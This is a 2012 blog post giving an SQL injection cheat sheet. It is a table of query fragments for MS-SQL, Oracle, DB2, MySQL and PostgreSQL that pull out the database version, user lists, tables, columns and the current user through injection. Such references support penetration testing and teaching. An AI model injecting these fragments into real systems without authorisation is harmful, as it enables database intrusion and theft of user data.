SQL Injection Cheat Sheet
Posted on Tuesday, January 03, 2012 by Tenderfoot
| Common SQL Injection Commands for Backend Databases | |
| --- | --- |
| MS-SQL | |
| Grab version | @@version |
| Users | name FROM master..syslogins |
| Tables | name FROM master..sysobjects WHERE xtype = 'U' |
| Database | name FROM master..sysdatabases; |
| Columns | name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<TABLENAME>') |
| Running User | SYSTEM_USER |
| Oracle | |
| Grab version | banner FROM v$version WHERE banner LIKE 'Oracle%' |
| Users | * from dba_users |
| Tables | table_name from all_tables |
| Database | distinct owner from all_tables |
| Columns | column_name from all_tab_columns where table_name = '<TABLENAME>' |
| Running User | user from dual |
| IBM DB2 | |
| Grab version | Versionnumber from sysibm.sysversions; |
| Users | user from sysibm.sysdummy1 |
| Tables | name from sysibm.systables |
| Database | schemaname from syscat.schemata |
| Columns | name, tbname, coltype from sysibm.syscolumns |
| Running User | user from sysibm.sysdummy1 |
| MySQL | |
| Grab version | @@version |
| Users | * from mysql.user |
| Tables | table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' |
| Database | distinct(db) FROM mysql.db |
| Columns | table_schema, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_name = '<TABLENAME>' |
| Running User | user() |
| PostgreSQL | |
| Grab version | version() |
| Users | * from pg_user |
| Database | datname FROM pg_database |
| Running User | user; |